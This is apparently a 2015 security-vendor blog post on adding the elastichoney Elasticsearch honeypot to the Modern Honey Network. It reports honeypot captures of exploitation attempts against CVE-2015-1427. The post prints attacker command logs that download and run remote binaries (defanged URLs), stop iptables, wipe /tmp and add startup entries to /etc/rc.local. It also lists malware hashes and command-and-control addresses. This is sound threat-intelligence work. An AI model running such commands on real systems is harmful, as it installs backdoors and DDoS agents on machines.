May 1, 2015
-
Jason Trost
,

MHN Support for Elastichoney a New Elasticsearch Honeypot

<p><img src="https://cdn.filestackcontent.com/bE227npBQ1OtOamLmano" style="float: right; width: 150px; height: 149px; margin-left: 20px;"/> This week ThreatStream Labs extended the <a href="http://threatstream.github.io/mhn/" target="_blank">Modern Honey Network (MHN)</a> project to add support for a new honeypot named <a href="https://github.com/jordan-wright/elastichoney" target="_blank">elastichoney</a>. MHN is a free and open source (LGPL) project that enables anyone to quickly and easily deploy and manage honeypots. Elastichoney was developed by <a href="http://jordan-wright.github.io/blog/2015/03/23/introducing-elastichoney-an-Elasticsearch-honeypot/" target="_blank">Jordan Wright</a> (<a href="https://twitter.com/jw_sec" target="_blank">@jw_sec</a>). It is a honeypot that emulates some <a href="https://www.elastic.co/products/Elasticsearch" target="_blank">Elasticsearch</a> API endpoints with the goal of capturing exploitation attempts against Elasticsearch servers that are vulnerable to <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1427" target="_blank">CVE-2015-1427</a>. We added <a href="https://github.com/jordan-wright/elastichoney/pull/3" target="_blank">hpfeeds support</a> for it and integrated it with MHN by adding an <a href="https://github.com/threatstream/mnemosyne/pull/18" target="_blank">ingest module</a>, a <a href="https://github.com/threatstream/hpfeeds/pull/12" target="_blank">visualization module</a>, <a href="https://github.com/threatstream/hpfeeds-logger/pull/2/files" target="_blank">SIEM integration</a>, and a <a href="https://github.com/threatstream/mhn/pull/159" target="_blank">deployment script</a>.</p><p>After a software update, any MHN user can deploy and quickly leverage the data provided by this awesome honeypot in their MHN server or SIEM. After completing the integration we deployed 50 of these and started to get interesting hits almost immediately.</p><p>Here is a small sample of some command logs extracted from the elastichoney logs (Note: all URLs and IPs have been defanged). All of the scanning activity that we've seen has originated from IPs coming from China with the exception of one exploit attempt originating from Walnut City, California.</p><pre> Attacker: 61[.]160[.]215[.]111 Location: Nanjing, China Organization: China Telecom jiangsu province backbone Sensor: 32 Duration: 0.0 secs Log: [2015-04-29T09:12:56.588-0700] wget -O /tmp/ruvn hxxp://122[.]224[.]48[.]28:8000/tooles Attacker: 222[.]186[.]15[.]246 Location: Nanjing, China Organization: China Telecom jiangsu province backbone Sensor: 22 Duration: 15,544.016 secs Log: [2015-04-29T20:31:52.988-0700] service iptables stop [2015-04-29T20:31:53.276-0700] rm -r /tmp/* [2015-04-29T20:31:58.570-0700] wget -O /tmp/xiaoqiu hxxp://121[.]42[.]221[.]14:666/xiaoqiu [2015-04-29T20:32:03.871-0700] chmod 777 /tmp/xiaoqiu [2015-04-29T20:32:09.161-0700] nohup /tmp/xiaoqiu &gt; /dev/null 2&gt;&amp;1 [2015-04-29T20:32:14.432-0700] /tmp/xiaoqiu [2015-04-29T20:32:19.708-0700] ./tmp/xiaoqiu [2015-04-29T20:32:24.970-0700] wget -O /tmp/xiaoqiu32 hxxp://121[.]42[.]221[.]14:666/xiaoqiu32 [2015-04-29T20:32:30.217-0700] chmod 777 /tmp/xiaoqiu32 [2015-04-29T20:32:35.501-0700] nohup /tmp/xiaoqiu32 &gt; /dev/null 2&gt;&amp;1 [2015-04-29T20:32:40.750-0700] /tmp/xiaoqiu32 [2015-04-29T20:32:46.000-0700] ./tmp/xiaoqiu32 [2015-04-29T20:32:51.273-0700] wget -O /tmp/xiaoqiu hxxp://121[.]42[.]221[.]14:666/xiaoqiu [2015-04-29T20:32:56.536-0700] su root [2015-04-29T20:33:01.812-0700] chmod 777 /tmp/xiaoqiu [2015-04-29T20:33:07.061-0700] nohup /tmp/xiaoqiu &gt; /dev/null 2&gt;&amp;1 [2015-04-29T20:33:12.312-0700] /tmp/xiaoqiu [2015-04-29T20:33:17.572-0700] ./tmp/xiaoqiu [2015-04-29T20:33:22.843-0700] wget -O /tmp/xiaoqiu32 hxxp://121[.]42[.]221[.]14:666/xiaoqiu32 [2015-04-29T20:33:28.809-0700] su root [2015-04-29T20:33:34.411-0700] chmod 777 /tmp/xiaoqiu32 [2015-04-29T20:33:39.672-0700] nohup /tmp/xiaoqiu32 &gt; /dev/null 2&gt;&amp;1 [2015-04-29T20:33:44.928-0700] /tmp/xiaoqiu32 [2015-04-29T20:33:50.201-0700] ./tmp/xiaoqiu32 [2015-04-30T00:50:57.004-0700] wget -O /tmp/xiao3 hxxp://121[.]42[.]221[.]14:666/xiao3 Attacker: 61[.]176[.]222[.]160 Location: shenyang, China Organization: China Unicom Liaoning Sensor: 11 Duration: 44.18 secs Log: [2015-04-29T06:22:05.595-0700] rm * [2015-04-29T06:22:06.063-0700] curl -o /tmp/zlwanby hxxp://61[.]176[.]222[.]160:222/zlwanby [2015-04-29T06:22:11.509-0700] wget -c hxxp://61[.]176[.]222[.]160:222/zlwanby [2015-04-29T06:22:16.962-0700] chmod 777 /tmp/./zlwanby [2015-04-29T06:22:22.418-0700] /tmp/./zlwanby [2015-04-29T06:22:27.870-0700] nohup /tmp/zlwanby &gt; /dev/null 2&gt;&amp;1 [2015-04-29T06:22:33.355-0700] echo "cd /tmp/"&gt;&gt;/etc/rc.local [2015-04-29T06:22:38.838-0700] echo "/tmp/zlwanby"&gt;&gt;/etc/rc.local [2015-04-29T06:22:44.306-0700] echo "/etc/init.d/iptables stop"&gt;&gt;/etc/rc.local [2015-04-29T06:22:49.775-0700] rm /tmp/* Attacker: 222[.]186[.]21[.]166 Location: Nanjing, China Organization: China Telecom jiangsu province backbone Sensor: 26 Duration: 3,766.057 secs Log: [2015-04-29T06:21:32.547-0700] rm * [2015-04-29T06:21:33.269-0700] curl -o /tmp/udpg hxxp://23[.]234[.]25[.]203:15826/udpg [2015-04-29T06:21:40.166-0700] wget -c hxxp://23[.]234[.]25[.]203:15826/udpg [2015-04-29T06:21:40.482-0700] chmod 777 /tmp/udpg [2015-04-29T06:21:45.807-0700] /tmp/udpg [2015-04-29T06:21:46.135-0700] rm /tmp/* [2015-04-29T07:23:57.416-0700] rm * [2015-04-29T07:23:57.665-0700] curl -o /tmp/udpg hxxp://23[.]234[.]25[.]203:15826/udpg [2015-04-29T07:24:02.902-0700] wget -c hxxp://23[.]234[.]25[.]203:15826/udpg [2015-04-29T07:24:08.135-0700] chmod 777 /tmp/udpg [2015-04-29T07:24:13.369-0700] /tmp/udpg [2015-04-29T07:24:18.604-0700] rm /tmp/* Attacker: 199[.]83[.]94[.]78 Location: Walnut, California, United States Organization: Psychz Networks Sensor: 31 Duration: 0.0 secs Log: [2015-04-30T05:07:27.683-0700] wget -O /tmp/wocao hxxp://198[.]13[.]96[.]38:7878/wocao Attacker: 117.21.176.64 Location: Nanchang, China Organization: China Telecom Jiangxi Sensor: 1 Duration: 361.757 secs Log: [2015-04-30T04:07:11.639-0700] service iptables stop [2015-04-30T04:07:36.973-0700] rm -r /tmp/* [2015-04-30T04:08:40.523-0700] wget -O /tmp/Hostys hxxp://117[.]21[.]176[.]64:4899/http [2015-04-30T04:08:45.831-0700] chmod 777 /tmp/Hostys [2015-04-30T04:08:51.443-0700] nohup /tmp/Hostys &gt; /dev/null 2&gt;&amp;1 [2015-04-30T04:08:56.705-0700] /tmp/Hostys [2015-04-30T04:09:08.743-0700] ./tmp/Hostys [2015-04-30T04:09:36.338-0700] wget -O /tmp/Hostus hxxp://117[.]21[.]176[.]64:4899/http [2015-04-30T04:10:11.101-0700] chmod 777 /tmp/Hostus [2015-04-30T04:10:47.887-0700] nohup /tmp/Hostus &gt; /dev/null 2&gt;&amp;1 [2015-04-30T04:11:13.986-0700] /tmp/Hostus [2015-04-30T04:11:49.684-0700] ./tmp/Hostus [2015-04-30T04:11:58.686-0700] wget -O /tmp/Hostys1 hxxp://117[.]21[.]176[.]64:4899/http [2015-04-30T04:12:03.955-0700] su root [2015-04-30T04:12:09.238-0700] chmod 777 /tmp/Hostys1 [2015-04-30T04:12:14.547-0700] nohup /tmp/Hostys1 &gt; /dev/null 2&gt;&amp;1 [2015-04-30T04:12:22.983-0700] /tmp/Hostys1 [2015-04-30T04:12:28.298-0700] ./tmp/Hostys1 [2015-04-30T04:12:33.672-0700] wget -O /tmp/http hxxp://117[.]21[.]176[.]64:4899/http [2015-04-30T04:12:42.031-0700] su root [2015-04-30T04:12:57.485-0700] chmod 777 /tmp/http [2015-04-30T04:13:02.752-0700] nohup /tmp/http &gt; /dev/null 2&gt;&amp;1 [2015-04-30T04:13:08.126-0700] /tmp/http [2015-04-30T04:13:13.396-0700] ./tmp/http Attacker: 61[.]176[.]220[.]162 Location: shenyang, China Organization: China Unicom Liaoning Sensor: 19 Duration: 43.611 secs Log: [2015-04-30T00:12:56.107-0700] rm * [2015-04-30T00:12:56.500-0700] curl -o /tmp/zlbyy hxxp://61[.]176[.]220[.]162:222/zlbyy [2015-04-30T00:13:01.933-0700] wget -c hxxp://61[.]176[.]220[.]162:222/zlbyy [2015-04-30T00:13:07.340-0700] chmod 777 /tmp/./zlbyy [2015-04-30T00:13:12.716-0700] /tmp/./zlbyy [2015-04-30T00:13:18.113-0700] nohup /tmp/zlbyy &gt; /dev/null 2&gt;&amp;1 [2015-04-30T00:13:23.541-0700] echo "cd /tmp/"&gt;&gt;/etc/rc.local [2015-04-30T00:13:28.930-0700] echo "/tmp/zlbyy"&gt;&gt;/etc/rc.local [2015-04-30T00:13:34.333-0700] echo "/etc/init.d/iptables stop"&gt;&gt;/etc/rc.local [2015-04-30T00:13:39.718-0700] rm /tmp/* </pre><p>Of the files that we could retrieve, all were ELF 32-bit Linux binaries and all are now on virustotal and are identified as Linux Backdoors or DDoS agents.</p><table border="1" style="border-collapse:collapse;width:100%;margin-bottom:25px;"><tbody><tr><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">Filename</th><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">MD5</th><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">VT Detections</th><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">Filetype</th></tr><tr><td style="background:#fff;padding:8px;line-height:1.2em;">http</td><td style="background:#fff;padding:8px;line-height:1.2em;">ab84831f6adf1e3183dc947855ef1364</td><td style="background:#fff;padding:8px;line-height:1.2em;"><a href="https://www.virustotal.com/en/file/25a23e4b096263f4fc3f3508191f3f8df92a95c8fb853821b4f983156509053e/analysis/" target="_blank">27 of 57</a></td><td style="background:#fff;padding:8px;line-height:1.2em;">ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped</td></tr><tr><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">tooles</td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">083c14e97952c70434ad5a458e1b0255</td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;"><a href="https://www.virustotal.com/en/file/b4e69d685be5e71d14d44dfc1123e447778044c94198d2752801dc19101086fe/analysis/" target="_blank">21 of 55</a></td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped</td></tr><tr><td style="background:#fff;padding:8px;line-height:1.2em;">xiao3</td><td style="background:#fff;padding:8px;line-height:1.2em;">beef6284e842b20370565f2289123a7c</td><td style="background:#fff;padding:8px;line-height:1.2em;"><a href="https://www.virustotal.com/en/file/569c055289c6cee9c6fa3fba0b14c4cf17517ce11aa6ec1e3eac8f4a281af325/analysis/" target="_blank">17 of 56</a></td><td style="background:#fff;padding:8px;line-height:1.2em;">ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped</td></tr><tr><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">zlbyy</td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">818e28906d4e9c131c965bff4e07145b</td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;"><a href="https://www.virustotal.com/en/file/698648e067d39035933babbfe6d8ae998fdb2b0e3d89b6ea321a5ec802fbab5a/analysis/" target="_blank">14 of 56</a></td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped</td></tr><tr><td style="background:#fff;padding:8px;line-height:1.2em;">zlwanbq</td><td style="background:#fff;padding:8px;line-height:1.2em;">818e28906d4e9c131c965bff4e07145b</td><td style="background:#fff;padding:8px;line-height:1.2em;"><a href="https://www.virustotal.com/en/file/698648e067d39035933babbfe6d8ae998fdb2b0e3d89b6ea321a5ec802fbab5a/analysis/" target="_blank">14 of 56</a></td><td style="background:#fff;padding:8px;line-height:1.2em;">ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped</td></tr></tbody></table><p>As you can see, each of these IPs were attempting to exploit servers they thought to be running a vulnerable version of Elasticsearch. It looks like their intent was to install DDoS tools on these machines to leverage them in attacks against other networks. It is highly recommended that you not expose your Elasticsearch servers directly to the Internet, but if you do, you should definitely upgrade to the latest version.</p><p>We sandboxed each of these samples in our home grown linux malware sandbox and were able to extract the following network indicators from two of the binaries.</p><table border="1" style="border-collapse:collapse;width:100%;margin-bottom:25px;"><tbody><tr><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">MD5</th><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">IP</th><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">Port</th><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">Protocol</th></tr><tr><td style="background:#fff;padding:8px;line-height:1.2em;">beef6284e842b20370565f2289123a7c</td><td style="background:#fff;padding:8px;line-height:1.2em;">21[.]42[.]221[.]14</td><td style="background:#fff;padding:8px;line-height:1.2em;">10991</td><td style="background:#fff;padding:8px;line-height:1.2em;">TCP</td></tr><tr><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">818e28906d4e9c131c965bff4e07145b</td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">123[.]131[.]52[.]13</td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">28099</td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">TCP</td></tr></tbody></table><p>Here is a splunk dashboard we created to explore this data. This dashboard will be incorporated into the <a href="https://splunkbase.splunk.com/app/2707/" target="_blank">MHN Splunk app</a> so any user that has integrated their MHN with Splunk can explore this data and build customized alerts in Splunk.</p><p><img src="https://cdn.filestackcontent.com/vHaA3p47SaO4H5YWkIiG" style="width: 700px; height: 554px;"/></p><p>To conclude, we recently added support for a new Elasticsearch honeypot named elastichoney to the Modern Honey Network (MHN) project. This enables anyone that has deployed MHN to easily deploy elastichoney and collect threat intelligence on who is scanning for and attempting to exploit Elasticsearch servers. If this sort of work interests you, ThreatStream is <a href="http://threatstream.com/careers">hiring both researchers and engineers</a> and if you want to be protected from threats like this, <a href="https://ui.threatstream.com/registration/">sign up to try ThreatStream Optic</a>.</p>

Get the Latest Anomali Updates and Cybersecurity News – Straight To Your Inbox

Become a subscriber to the Anomali Newsletter
Receive a monthly summary of our latest threat intelligence content, research, news, events, and more.